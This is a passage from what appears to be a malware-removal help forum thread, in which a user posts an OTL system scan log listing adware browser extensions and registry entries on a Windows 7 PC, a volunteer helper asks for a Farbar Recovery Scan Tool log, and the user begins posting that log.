FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.65.2: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.65.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: disabled File not found
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WLPG,version=16.4.3508.0205: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@citrixonline.com/appdetectorplugin: C:\Users\Mitey Fresh\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\ProgramData\iSkysoft\Video Converter Ultimate\[email protected]\ [2014/09/30 17:07:04 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\[email protected]: C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected] [2014/10/01 14:52:22 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 28.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 28.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 28.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components
FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 28.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins
 
[2013/10/05 13:03:05 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Extensions
[2014/10/01 14:52:23 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions
[2014/10/01 14:52:22 | 000,000,000 | ---D | M] ("Fast Start") -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]
[2014/02/19 15:57:47 | 000,000,000 | ---D | M] (UTubErAdBllockEr) -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]
[2014/09/13 12:29:01 | 000,000,000 | ---D | M] (No name found) -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\staged
[2014/03/24 13:31:39 | 000,000,000 | ---D | M] (RooboSaver) -- C:\Users\Mitey Fresh\AppData\Roaming\Mozilla\Firefox\Profiles\ow597pnn.default\extensions\[email protected]
[2014/06/05 12:10:08 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions
[2014/04/19 13:26:24 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2014/09/30 17:07:04 | 000,000,000 | ---D | M] (iSkysoft Video Converter Ultimate) -- C:\PROGRAMDATA\ISKYSOFT\VIDEO CONVERTER ULTIMATE\[email protected]
File not found (No name found) -- C:\USERS\MITEY FRESH\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\OW597PNN.DEFAULT\EXTENSIONS\[email protected]C2592D0DF.COM
 
========== Chrome  ==========
 
CHR - default_search_provider: Google (Enabled)
CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}
CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},
CHR - plugin: Error reading preferences file
CHR - Extension: SEOquake = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\akdgnmcogleenhbclghghlkkdndkjdjc\1.0.21_0\
CHR - Extension: Google Docs = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.7_0\
CHR - Extension: Google Drive = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\
CHR - Extension: YouTube = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\
CHR - Extension: Google Search = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\
CHR - Extension: Reddit Enhancement Suite = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kbmfpngjjgdllneeigpgjifpgocmfgmb\4.3.2.1_0\
CHR - Extension: Google Wallet = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_1\
CHR - Extension: Gmail = C:\Users\Mitey Fresh\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_1\
 
O1 HOSTS File: ([2009/06/11 08:00:26 | 000,000,824 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts
O2:64bit: - BHO: (Reg Error: Value error.) - {25880CCB-24B8-785F-89B4-3DDCE851F8CF} - C:\ProgramData\UTubErAdBllockEr\ImNx2Dy8_.x64.dll File not found
O2:64bit: - BHO: (RooboSaver) - {65716D5D-F3D7-C35B-7F16-25F69BF58395} - C:\ProgramData\RooboSaver\9BLj9uIzS.x64.dll File not found
O2 - BHO: (UTubErAdBllockEr) - {25880CCB-24B8-785F-89B4-3DDCE851F8CF} - C:\ProgramData\UTubErAdBllockEr\ImNx2Dy8_.dll File not found
O2 - BHO: (RooboSaver) - {65716D5D-F3D7-C35B-7F16-25F69BF58395} - C:\ProgramData\RooboSaver\9BLj9uIzS.dll File not found
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (iSkysoft Video Converter Ultimate 5.1.0) - {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} - C:\ProgramData\iSkysoft\Video Converter Ultimate\WSBrowserAppMgr.dll (Wondershare)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O4:64bit: - HKLM..\Run: [FAHConsole] C:\Program Files\File Association Helper\FAHConsole.exe (Nico Mak Computing)
O4:[b]64bit: - HKLM..\Run: [HotKeysCmds] C:\Windows\SysNative\hkcmd.exe (Intel Corporation)
O4:[b]64bit: - HKLM..\Run: [IgfxTray] C:\Windows\SysNative\igfxtray.exe (Intel Corporation)
O4:[b]64bit: - HKLM..\Run: [MSC] c:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)
O4:[b]64bit: - HKLM..\Run: [Persistence] C:\Windows\SysNative\igfxpers.exe (Intel Corporation)
O4 - HKCU..\Run: [Spotify Web Helper] C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe (Spotify Ltd)
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktop = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoActiveDesktopChanges = 1
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5
O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3
O13[b]64bit: - gopher Prefix: missing
O13 - gopher Prefix: missing
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{50EF78CE-304E-4B7A-9AAB-DDBCC5200660}: DhcpNameServer = 192.168.0.1
O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{910DEC28-ADB7-41E8-A772-D1D261B4EC8C}: DhcpNameServer = 192.168.1.1 192.168.1.1
O18:[b]64bit: - Protocol\Handler\msdaipp - No CLSID value found
O18:[b]64bit: - Protocol\Handler\msdaipp\0x00000001 - No CLSID value found
O18:[b]64bit: - Protocol\Handler\msdaipp\oledb - No CLSID value found
O18:[b]64bit: - Protocol\Handler\mso-offdap - No CLSID value found
O18:[b]64bit: - Protocol\Handler\mso-offdap11 - No CLSID value found
O18:[b]64bit: - Protocol\Handler\skype4com - No CLSID value found
O18:[b]64bit: - Protocol\Handler\wlpg - No CLSID value found
O18:[b]64bit: - Protocol\Handler\WSISVCUchrome - No CLSID value found
O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
O18 - Protocol\Handler\WSISVCUchrome - No CLSID value found
O18:[b]64bit: - Protocol\Filter\text/xml - No CLSID value found
O20:[b]64bit: - AppInit_DLLs: (C:\PROGRA~3\FASTAN~1\FASTAN~2.DLL) -  File not found
O20 - AppInit_DLLs: (c:\progra~3\fastan~1\fastan~1.dll) -  File not found
O20:[b]64bit: - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)
O20:[b]64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)
O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)
O20 - HKLM Winlogon: UserInit - (userinit.exe) - C:\Windows\SysWow64\userinit.exe (Microsoft Corporation)
O20:[b]64bit: - Winlogon\Notify\igfxcui: DllName - (igfxdev.dll) - C:\Windows\SysNative\igfxdev.dll (Intel Corporation)
O21:[b]64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.
O32 - HKLM CDRom: AutoRun - 1
O33 - MountPoints2\{496991f1-83b7-11e3-a045-406186b70622}\Shell - "" = AutoRun
O33 - MountPoints2\{496991f1-83b7-11e3-a045-406186b70622}\Shell\AutoRun\command - "" = H:\autorun.exe
O33 - MountPoints2\{6140cd31-99d4-11e3-ac34-406186b70622}\Shell - "" = AutoRun
O33 - MountPoints2\{6140cd31-99d4-11e3-ac34-406186b70622}\Shell\AutoRun\command - "" = F:\HTC_Sync_Manager_PC.exe
O33 - MountPoints2\{efd7f59c-3f87-11e4-aca2-406186b70622}\Shell - "" = AutoRun
O33 - MountPoints2\{efd7f59c-3f87-11e4-aca2-406186b70622}\Shell\AutoRun\command - "" = F:\Startme.exe
O34 - HKLM BootExecute: (autocheck autochk *)
O35:[b]64bit: - HKLM\..comfile [open] -- "%1" %*
O35:[b]64bit: - HKLM\..exefile [open] -- "%1" %*
O35 - HKLM\..comfile [open] -- "%1" %*
O35 - HKLM\..exefile [open] -- "%1" %*
O37:[b]64bit: - HKLM\...com [@ = comfile] -- "%1" %*
O37:[b]64bit: - HKLM\...exe [@ = exefile] -- "%1" %*
O37 - HKLM\...com [@ = comfile] -- "%1" %*
O37 - HKLM\...exe [@ = exefile] -- "%1" %*
O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)
O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)
O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)
 
========== Files/Folders - Created Within 30 Days ==========
 
[2014/10/01 14:54:32 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\SupTab
[2014/10/01 14:52:30 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
[2014/10/01 14:51:50 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip
[2014/10/01 14:51:45 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Local\WinZip
[2014/10/01 14:51:08 | 000,000,000 | ---D | C] -- C:\ProgramData\WinZip
[2014/10/01 14:50:58 | 000,000,000 | ---D | C] -- C:\Program Files\WinZip
[2014/09/30 17:15:15 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\Desktop\Mitey Shield video
[2014/09/30 17:07:43 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
[2014/09/30 17:07:40 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\Documents\iSkysoft Video Converter Ultimate
[2014/09/30 17:07:24 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Local\iSkysoft
[2014/09/30 17:07:18 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\iSkysoft
[2014/09/30 17:07:06 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iSkysoft
[2014/09/30 17:06:27 | 000,000,000 | ---D | C] -- C:\ProgramData\iSkysoft Video Converter Ultimate
[2014/09/30 17:06:15 | 000,000,000 | ---D | C] -- C:\ProgramData\iSkysoft
[2014/09/30 17:06:15 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\iSkysoft
[2014/09/30 17:05:20 | 000,000,000 | ---D | C] -- C:\Users\Public\Documents\iSkysoft
[2014/09/22 18:48:09 | 000,000,000 | ---D | C] -- C:\Users\Mitey Fresh\AppData\Roaming\vlc
[2014/09/22 18:46:55 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\VLC
[2014/09/17 09:22:29 | 000,000,000 | ---D | C] -- C:\ProgramData\Browser AdBlocker
 
========== Files - Modified Within 30 Days ==========
 
[2014/10/14 16:28:00 | 000,000,830 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job
[2014/10/14 16:15:00 | 000,000,908 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014/10/14 16:09:00 | 000,000,598 | ---- | M] () -- C:\Windows\tasks\G2MUpdateTask-S-1-5-21-2275511576-419542734-2349628481-1000.job
[2014/10/14 15:15:00 | 000,000,904 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014/10/14 06:55:03 | 000,024,048 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014/10/14 06:55:03 | 000,024,048 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014/10/14 06:52:07 | 002,955,376 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat
[2014/10/14 06:52:07 | 001,287,800 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat
[2014/10/14 06:52:07 | 000,006,206 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI
[2014/10/14 06:47:12 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014/10/14 06:47:06 | 3056,103,424 | -HS- | M] () -- C:\hiberfil.sys
[2014/10/08 16:29:24 | 000,002,350 | ---- | M] () -- C:\Users\Public\Desktop\Google Chrome.lnk
[2014/10/02 17:52:02 | 000,002,547 | ---- | M] () -- C:\Users\Mitey Fresh\Desktop\`Staff Computer - Shortcut.lnk
[2014/10/01 14:52:11 | 000,002,501 | ---- | M] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
[2014/10/01 14:52:11 | 000,001,659 | ---- | M] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk
[2014/09/30 17:12:05 | 000,076,441 | ---- | M] () -- C:\Users\Mitey Fresh\Desktop\Mitey Shield videos.wlmp
[2014/09/30 17:07:06 | 000,001,354 | ---- | M] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\iSkysoft Video Converter Ultimate.lnk
[2014/09/29 21:19:55 | 433,221,317 | ---- | M] () -- C:\Windows\MEMORY.DMP
[2014/09/26 13:08:59 | 000,000,004 | ---- | M] () -- C:\Users\Mitey Fresh\AppData\Roaming\appdataFr2.bin
[2014/09/19 12:43:03 | 000,013,824 | ---- | M] () -- C:\Users\Mitey Fresh\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
 
========== Files Created - No Company Name ==========
 
[2014/09/30 17:07:06 | 000,001,354 | ---- | C] () -- C:\Users\Mitey Fresh\Application Data\Microsoft\Internet Explorer\Quick Launch\iSkysoft Video Converter Ultimate.lnk
[2014/09/30 17:06:57 | 000,721,263 | ---- | C] () -- C:\Windows\SysWow64\ISCM64.dll
[2014/09/30 17:06:57 | 000,214,528 | ---- | C] () -- C:\Windows\SysWow64\ISCM32.dll
[2014/09/29 19:47:17 | 000,076,441 | ---- | C] () -- C:\Users\Mitey Fresh\Desktop\Mitey Shield videos.wlmp
[2014/09/17 09:37:48 | 000,000,004 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Roaming\appdataFr2.bin
[2014/07/10 17:27:56 | 000,004,096 | -H-- | C] () -- C:\Users\Mitey Fresh\AppData\Local\keyfile3.drm
[2014/03/11 16:33:22 | 000,002,149 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Local\recently-used.xbel
[2014/02/03 08:33:54 | 000,000,258 | RHS- | C] () -- C:\ProgramData\ntuser.pol
[2013/12/19 09:49:37 | 000,000,027 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Roaming\WB.CFG
[2013/08/08 12:48:44 | 000,007,061 | ---- | C] () -- C:\Program Files\Common Files\ecisettings.props.preupdate
[2013/08/08 12:37:38 | 000,002,539 | ---- | C] () -- C:\Program Files\Common Files\ECI_Data.bat
[2013/08/08 12:37:38 | 000,000,329 | ---- | C] () -- C:\Program Files\Common Files\AppMgrIcon.gif
[2013/08/08 12:37:38 | 000,000,128 | ---- | C] () -- C:\Program Files\Common Files\StartClient.bat
[2013/05/28 17:24:28 | 000,013,824 | ---- | C] () -- C:\Users\Mitey Fresh\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2013/05/09 12:25:17 | 000,061,304 | ---- | C] () -- C:\Users\Mitey Fresh\g2mdlhlpx.exe
[2013/04/05 11:10:11 | 000,764,746 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2013/03/28 13:45:05 | 000,000,376 | ---- | C] () -- C:\Windows\ODBC.INI
 
========== ZeroAccess Check ==========
 
[2009/07/14 15:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2014/06/25 13:05:42 | 014,175,744 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2014/06/25 12:41:30 | 012,874,240 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009/07/14 12:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 23:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009/07/14 12:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2014/10/10 11:45:41 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\AUSkey
[2013/07/28 21:46:44 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\AutoBinaryCode2
[2014/09/12 21:15:52 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\BatteryCare
[2014/04/08 21:58:58 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\BitComet
[2014/06/26 20:50:56 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\calibre
[2013/11/18 21:12:47 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Com.Comm100.LiveChat.AirVisitorMonitor.En
[2013/11/18 21:12:46 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Com.Comm100.LiveChat.AirVisitorMonitor.En.ED02F0ED4016DF29F52CC2E3BD1ED89CCC440D32.1
[2014/01/23 10:00:34 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\DAEMON Tools Lite
[2013/03/28 16:55:05 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Monotype Imaging
[2014/10/01 14:43:05 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\PerformerSoft
[2014/02/09 21:43:00 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\rmi
[2014/10/03 21:35:27 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\Spotify
[2014/10/01 14:54:32 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\SupTab
[2014/10/02 13:43:04 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\sweet-page
[2014/09/30 17:07:43 | 000,000,000 | ---D | M] -- C:\Users\Mitey Fresh\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A}
 
========== Purity Check ==========
 
 
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 40 bytes -> C:\ProgramData\MTA San Andreas All:NT
@Alternate Data Stream - 40 bytes -> C:\ProgramData:NT
@Alternate Data Stream - 160 bytes -> C:\ProgramData\MTA San Andreas All:NT2
@Alternate Data Stream - 160 bytes -> C:\ProgramData:NT2
@Alternate Data Stream - 131 bytes -> C:\ProgramData\TEMP:373E1720
 
< End of report >
 

 

 

 

 


  • 0

Advertisements


#2
awesomesauce

awesomesauce

    Member

  • Topic Starter
  • Member
  • PipPip
  • 21 posts

I should add that this problem is with Chrome.


  • 0

#3
Biscuithd

Biscuithd

    Trusted Helper

  • Malware Removal
  • 2,573 posts

Hi there,

 

I appreciate the OTL log, however, you have some pecularities in your OTL scan that make me want to see your machine scanned by a different tool as well. Would you please perform the following scan and post the resulting two files.

 

FRST.gif Scan with Farbar Recovery Scan Tool

Please download Farbar Recovery Scan Tool and save it to your Desktop.


  • Right-click on FRST.gif icon and select RunAsAdmin.jpg Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • When the tool opens click Yes to disclaimer.
  • Make sure that Addition option is checked.
  • Press Scan button and wait.
  • The tool will produce two logfiles on your desktop: FRST.txt and Addition.txt.

Please copy and paste their content into your next reply.

 


  • 0

#4
awesomesauce

awesomesauce

    Member

  • Topic Starter
  • Member
  • PipPip
  • 21 posts

Hi,

 

Thank you for your response.

 

The link to Farbar Recovery Tool gave the response that it wouldn't work on my OS, so I found FRST64 on this website instead: http://filepony.de/d...ror-server.html

 

Here is the FRST.txt logfile:

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 14-10-2014
Ran by Mitey Fresh (administrator) on KIRRA-PC on 15-10-2014 15:39:42
Running from C:\Users\Mitey Fresh\Downloads
Loaded Profile: Mitey Fresh (Available profiles: Mitey Fresh)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe
(Nico Mak Computing) C:\Program Files\File Association Helper\FAHWindow.exe
(Spotify Ltd) C:\Users\Mitey Fresh\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Microsoft Corporation) C:\Program Files\Microsoft LifeCam\MSCamS64.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(LogMeIn Inc.) D:\Games\LogMeIn Hamachi\hamachi-2.exe
(LogMeIn, Inc.) D:\Games\LogMeIn Hamachi\LMIGuardianSvc.exe
(LogMeIn Inc.) D:\Games\LogMeIn Hamachi\hamachi-2-ui.exe
(LogMeIn, Inc.) D:\Games\LogMeIn Hamachi\LMIGuardianSvc.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\OFFICE11\OUTLOOK.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\OFFICE11\WINWORD.EXE
(Microsoft Corporation) C:\Windows\splwow64.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\OFFICE11\EXCEL.EXE
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [1331288 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [FAHConsole] => C:\Program Files\File Association Helper\FAHConsole.exe [729272 2014-01-28] (Nico Mak Computing)
